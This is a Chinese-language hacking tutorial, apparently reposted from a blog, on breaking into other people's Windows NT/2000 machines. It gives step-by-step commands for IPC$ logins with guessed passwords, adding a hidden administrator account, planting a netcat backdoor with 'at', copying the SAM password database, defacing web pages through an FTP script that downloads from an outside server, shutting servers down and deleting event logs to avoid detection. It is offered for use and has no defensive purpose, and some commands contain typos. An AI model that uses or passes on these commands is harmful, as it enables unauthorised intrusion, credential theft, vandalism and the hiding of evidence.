尝试进入别人的电脑和服务器

尝试进入别人的电脑和服务器........　

　　　　1、取得对方IP地址如XX.XX.XX.XX，方法太多不细讲了。

　　　　2.判断对方上网的地点，开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。

　　　　3.得到对方电脑的名称，开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组 第三行是对方电脑的说明

　　　　4.在Windows目录下有一文件名为LMHOSTS.SAM，将其改名为LMHOSTS，删除其内容，将对方的IP及电脑名按以下格式写入文件： XX.XX.XX.XX 电脑名

　　　　5.开DOS窗口键入 NBTSTAT -R 6.在开始-查找-电脑中输入对方电脑名，出现对方电脑点击即可进入

　　　　黑客命令之1：NET

　　　　只要你拥有某IP的用户名和密码，那就用IPC$做连接吧！

　　　　这里我们假如你得到的用户是hbx，密码是123456。假设对方IP为

　　　　127.0.0.1

　　　　net use \\127.0.0.1\ipc$ "123456" /user:"hbx"

　　　　退出的命令是

　　　　net use \\127.0.0.1\ipc$ /delte

　　　　下面的*作你必须登陆后才可以用.登陆的方法就在上面.

　　　　----------------------

　　　　下面我们讲怎么创建一个用户，由于SA的权限相当于系统的超级用

　　　　户.

　　　　我们加一个heibai的用户密码为lovechina

　　　　net user heibai lovechina /add

　　　　只要显示命令成功,那么我们可以把他加入Administrator组了.

　　　　net localgroup Administrators heibai /add

　　　　----------------------

　　　　这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这

　　　　里把对方的C盘映射到本地的Z盘.

　　　　net use z:\\127.0.0.1\c$

　　　　----------------------

　　　　net start telnet

　　　　这样可以打开对方的TELNET服务.

　　　　----------------------

　　　　这里是将Guest用户激活，guest是NT的默认用户，而且无法删除呢？

　　　　不知道是否这样，我的2000就是删除不了它。

　　　　net user guest /active:yes

　　　　----------------------

　　　　这里是把一个用户的密码改掉，我们把guest的密码改为lovechina，

　　　　其他用户也可以的。只要有权限就行了呀！

　　　　net user guest lovechina

　　　　黑客命令之2:at

　　　　一般一个入侵者入侵后都会留下后门，也就是种木马了，你把木马传了上去，怎么启动他呢？

　　　　那么需要用AT命令，这里假设你已经登陆了那个服务器。

　　　　你首先要得到对方的时间，

　　　　net time \\127.0.0.1

　　　　将会返回一个时间，这里假设时间为12:1,现在需要新建一个作业，其ID=1

　　　　at \\127.0.0.1 12:3 nc.exe

　　　　这里假设了一个木马，名为NC.EXE,这个东西要在对方服务器上.

　　　　这里介绍一下NC,NC是NETCAT的简称,为了方便输入,一般会被改名.它

　　　　是一个TELNET服务,端口为99.

　　　　等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马.

　　　　黑客命令之3:telnet

　　　　这个命令非常实用,它可以与远方做连接，不过正常下需要密码、用

　　　　户,不过你给对方种了木马,直接连到这个木马打开的端口.

　　　　telnet 127.0.0.1 99

　　　　这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也

　　　　就是肉鸡.

　　　　黑客命令之4:FTP

　　　　它可以将你的东西传到对方机子上,你可以去申请个支持FTP上传的空

　　　　间,国内多的是,如果真的找不到,我给个http://WWW.51.NET,

　　　　不错的.当我们申请完后，它会给用户名,密码,以及FTP服务器

　　　　在上传前需要登陆先，这里我们假设FTP服务器是 H,ttp://WWW.51.NET

　　　　用户名是HUCJS,密码是654321

　　　　ftpwww.51.net

　　　　他会要求输入用户,成功后会要求输入密码.----------------------

　　　　下面先说上传,假设你需上传的文件是INDEX.HTM,它位于C:\下,传到对方D:\

　　　　get c:\index.htm d:\

　　　　假设你要把对方C盘下的INDEX.HTM,下到你的机子的D盘下

　　　　put c:\index.htm d:\

　　　　黑客命令之5:copy

　　　　下面我说说怎样把本地的文件复制到对方硬盘上去，需要建立好IPC$连接才有效。

　　　　这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下

　　　　copy index.htm \\127.0.0.1\c$\index.htm ----------------------

　　　　如果你要复制到D盘下把C改为D，就行了！

　　　　copy index.htm \\127.0.0.1\d$\index.htm ----------------------

　　　　如果你要把他复制到WINNT目录里

　　　　就要把输入

　　　　copy index.htm \\127.0.0.1\admin$\index.htm

　　　　admin$是winnt ----------------------

　　　　要把对方的文件复制过来，顺便告诉大家NT的备份的数据库放在

　　　　x:\winnt\repair\sam._ sam._是数据库的文件名

　　　　下面就把127.0.0.1的数据库复制到本地C盘下

　　　　copy \\127.0.0.1\admin$\repair\sam._ c:\

　　　　黑客命令之7：nbtstat

　　　　如果你扫到一部NT的机子，他的136到139其中一个端口开了的话，就

　　　　要用这个命令得到用户了。顺便告诉大家这是netbios，得到用户名后

　　　　就可以猜猜密码了。例如比较简单的密码，密码和用户名一样的，都

　　　　试下，不行就暴力破解吧！

　　　　现在网上很多NT的机子都开了这些端口的，你可以练习下，我们来分

　　　　析得到的结果。

　　　　命令是

　　　　nbtstat -A XX.XX.XX.XX

　　　　-A一定要大写。

　　　　下面是得到的结果。

　　　　NetBIOS Remote Machine Name Table

　　　　Name 无效 Status

　　　　---------------------------------------------

　　　　Registered Registered Registered Registered Registered

　　　　Registered Registered Reg

　　　　istered Registered Registered Registered

　　　　MAC Address = 00-E0-29-14-35-BA

　　　　PENTIUMII <00> UNIQUE

　　　　PENTIUMII <20> UNIQUE

　　　　ORAHOTOWN <00> GROUP

　　　　ORAHOTOWN <1C> GROUP

　　　　ORAHOTOWN <1B> UNIQUE

　　　　PENTIUMII <03> UNIQUE

　　　　INet~Services <1C> GROUP

　　　　IS~PENTIUMII...<00> UNIQUE

　　　　ORAHOTOWN <1E> GROUP

　　　　ORAHOTOWN <1D> UNIQUE

　　　　..__MSBROWSE__.<01> GROUP

　　　　粉红色的就是登陆过这部系统的用户，可能你不知道怎么看，大家是

　　　　不是看到了一窜数字，只要这窜数字是<03>的话，那他前面的就是用

　　　　户。

　　　　这里的用户是PENTIUMII。

　　　　黑客命令之8：Shutdown

　　　　关了对方的NT服务器的命令

　　　　Shutdown \\IP地址 t:20

　　　　20秒后将NT自动关闭，三思后才能运行这个命令，这样对对方造很大

　　　　的损失，要做个有良心的入侵者呀。

　　　　黑客命令之10：echo

　　　　著名的漏洞Unicode，这个命令可以简单的黑一下有这个漏洞的主

　　　　机。

　　　　我们假设我们要把“南京大屠杀铁证如山，任何日本人不得抵赖！”

　　　　写入index.htm，有2种方法，大家看看有什么区别。

　　　　echo 南京大屠杀铁证如山，任何日本人不得抵赖！>index.htm

　　　　echo 南京大屠杀铁证如山，任何日本人不得抵赖！>>index.htm

　　　　第一个的意思是覆盖index.htm原有的内容，把“南京大屠杀铁证如

　　　　山，任何日本人不得抵赖！”写进index.htm。

　　　　第二个的意思是把“南京大屠杀铁证如山，任何日本人不得抵赖！”

　　　　加到index.htm里面。

　　　　“>>”产生的内容将追加进文件中，“>”则将原文件内容覆盖。

　　　　大家可以本地试下。

　　　　可能你会问，这样简单黑下有什么好玩的，其实他可以用来下载主页

　　　　到对方的目录里。

　　　　1、首先，我们需要申请一个免费的主页空间。

　　　　2、用echo在可写目录下建立如下内容的txt文件：（以chinren服务器

　　　　为例。）

　　　　open upload.chinaren.com（你的FTP服务器，申请时你的空间提供商

　　　　会给你的）

　　　　cnhack（你申请时的用户名）

　　　　test（你申请时的密码）

　　　　get index.htm c:\inetpub\wwwroot\index.htm（这里是把你空间上

　　　　的index.htm下载到对方的c:\inetpub\wwwroot\index.htm）

　　　　bye（退出FTP对话，相当在98下的DOS，用EXIT退出DOS）

　　　　具体的做法：

　　　　输入 echo open upload.chinaren.com> c:\cnhack.txt

　　　　输入 echo cnhack >> c:\cnhack.txt

　　　　输入 echo 39abs >> c:\cnhack.txt

　　　　输入 echo get index.htm

　　　　c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt

　　　　最后输入 ftp -s:c:\cnhack.txt （利用ftp的-s参数，执行文件里的

　　　　内容。）

　　　　等命令完成时，文件已经下载到你指定的文件里了。

　　　　注意：取得文件后，请删除cnhack.txt。（如果不删除，很容易会给

　　　　别人看到你的密码。）

　　　　记得要 del c:\cnhack.txt

　　　　黑客命令之11:attrib

　　　　这个命令是设置文件属性的。如果你想黑一个站，而他的主页的文件

　　　　属性设置了只读，那就很可怜呀，想删除他也不行，想覆盖他也不

　　　　行。倒！不过有这个命令就别怕了。

　　　　attrib -r index.htm

　　　　这个命令是把index.htm的只读属性去掉。

　　　　如果把“-”改为“+”则是把这个文件的属性设置为只读 ----------------------

　　　　attrib +r index.htm

　　　　这个命令是把index.htm的属性设置为只读。

　　　　黑客命令之12:del

　　　　当你看到这个标题可别倒下啊！现在要离开127.0.0.1了，要删除日

　　　　志，当然要删除日志啦！想被捉吗。呵呵。

　　　　NT的日志有这些

　　　　del C:\winnt\system32\logfiles\*.*

　　　　del C:\winnt\ssytem32\config\*.evt

　　　　del C:\winnt\system32\dtclog\*.*

　　　　del C:\winnt\system32\*.log

　　　　del C:\winnt\system32\*.txt

　　　　del C:\winnt\*.txt

　　　　del C:\winnt\*.log

　　　　只要删除这些就可以了。有些系统NT安装在D盘或其他盘，就要把C改

　　　　成其他盘。

文章转载自http://hi.baidu.com/%CD%FB%CF%E9%D4%C6/blog/item/af4ce5235f712e569922ed10.html